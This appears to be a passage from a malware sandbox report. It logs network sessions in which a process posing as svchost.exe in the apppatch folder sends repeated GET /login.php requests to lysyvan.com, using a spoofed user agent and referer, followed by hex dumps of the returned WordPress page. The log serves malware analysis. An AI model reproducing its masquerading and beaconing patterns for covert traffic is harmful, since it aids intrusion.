                                                                                                                                                                                                          2024-09-08 08:52:39 UTC1369INData Raw: 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e
                                                                                                                                                                                                          Data Ascii: le-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-single-post .
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC1369INData Raw: 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22 5d 20
                                                                                                                                                                                                          Data Ascii: cus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigger"]
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC1369INData Raw: 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 3a 66 6f 63 75 73 2c 23 61 73 74 2d 63 6f 75 70 6f 6e 2d 63 6f 64 65 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 71 75 61 6e 74 69 74 79 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 2e 71 75 61 6e 74 69 74 79 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 66 6f 63 75
                                                                                                                                                                                                          Data Ascii: nt .woocommerce form .form-row .select2-container--default .select2-selection--single:focus,#ast-coupon-code:focus,.woocommerce.woocommerce-js .quantity input[type=number]:focus,.woocommerce-js .woocommerce-mini-cart-item .quantity input[type=number]:focu


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          2192.168.2.949746188.114.96.34431512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-09-08 08:53:19 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-09-08 08:53:20 UTC892INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:20 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="45.6",amp_style_sanitizer;dur="23.2",amp_tag_and_attribute_sanitizer;dur="13.2",amp_optimizer;dur="7.5"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P0BSGN8ltweW1QkLmDeiDFh3RZtcLJndyFskVj6NxKLedPRbrU0Y2MxHydwSdQ7QhCMYrd02CmTqqaAiec0KTCtRUmoDgZwjnH459s5VAs7D7b2KwlHadWzLkfq8Vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb51afbd63338-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-09-08 08:53:20 UTC477INData Raw: 37 63 33 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                          Data Ascii: 7c35<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                          2024-09-08 08:53:20 UTC1369INData Raw: 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64
                                                                                                                                                                                                          Data Ascii: l{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-text-size-ad
                                                                                                                                                                                                          2024-09-08 08:53:20 UTC1369INData Raw: 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e
                                                                                                                                                                                                          Data Ascii: tbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overflow-x:hidden
                                                                                                                                                                                                          2024-09-08 08:53:20 UTC1369INData Raw: 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f 74 28 5b 64 69 73 74 61 6e 63 65 5d 29 3a 6e 6f 74 28 5b 61 63 74 69 76 65 5d 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 30 76 68 29 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 69 6e 70 75 74 2c 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 74 65 78 74 61 72 65 61
                                                                                                                                                                                                          Data Ascii: und{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomplete>textarea
                                                                                                                                                                                                          2024-09-08 08:53:20 UTC1369INData Raw: 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79
                                                                                                                                                                                                          Data Ascii: not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i-amphtml-lay
                                                                                                                                                                                                          2024-09-08 08:53:20 UTC1369INData Raw: 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 72 65 70 6c 61 63 65 64 2d 63 6f 6e 74 65 6e 74 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 74 6f 70 3a 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 65 66 74 3a 30 70 78 21
                                                                                                                                                                                                          Data Ascii: ze-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!important;left:0px!
                                                                                                                                                                                                          2024-09-08 08:53:20 UTC1369INData Raw: 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3e 69 6d 67 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69
                                                                                                                                                                                                          Data Ascii: ot(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][height][hei
                                                                                                                                                                                                          2024-09-08 08:53:20 UTC1369INData Raw: 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 29 7d 69 2d 61 6d 70 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 2c 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b
                                                                                                                                                                                                          Data Ascii: none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top:0;left:0;
                                                                                                                                                                                                          2024-09-08 08:53:20 UTC1369INData Raw: 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 29 7b 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e 29 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 65 66 65 66 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 66 64 66 64 66 7d 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e
                                                                                                                                                                                                          Data Ascii: bmit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid #dfdfdf}:where(amp-accordion>section
                                                                                                                                                                                                          2024-09-08 08:53:20 UTC1369INData Raw: 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 6e 6f 6d 6f 64 75 6c 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2f 61 6d 70 2d 62 69 6e 64 2d 30 2e 31 2e 6d 6a 73 22 20 61 73 79 6e 63 3d 22 22 20 63 75 73 74 6f 6d 2d 65 6c 65 6d 65 6e 74 3d 22 61 6d 70 2d 62 69 6e 64 22 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f
                                                                                                                                                                                                          Data Ascii: e="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0.js" crossorigin="anonymous"></script><script src="https://cdn.ampproject.org/v0/amp-bind-0.1.mjs" async="" custom-element="amp-bind" type="module" crosso


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          3192.168.2.949748188.114.96.34431512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-09-08 08:53:21 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-09-08 08:53:22 UTC902INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:22 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="47.8",amp_style_sanitizer;dur="22.5",amp_tag_and_attribute_sanitizer;dur="21.3",amp_optimizer;dur="4.2"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUXgMjfBq6S2attjTSB7E3iwucP5Hrp9kcsDsELpFuYefC%2BhQmkzn1i7Unw8GjZfPvVqd%2BfvkjYGJYaNnPG3rJYDmRUXZ%2Bz%2BOnwiHwVTmJpIW%2Bct8EhO9gS8DhPx5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb5284f776a57-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-09-08 08:53:22 UTC467INData Raw: 37 63 32 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                          Data Ascii: 7c2b<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                          2024-09-08 08:53:22 UTC1369INData Raw: 33 34 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65
                                                                                                                                                                                                          Data Ascii: 34000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-te
                                                                                                                                                                                                          2024-09-08 08:53:22 UTC1369INData Raw: 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 7b 6f 76 65 72 66 6c 6f
                                                                                                                                                                                                          Data Ascii: phtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overflo
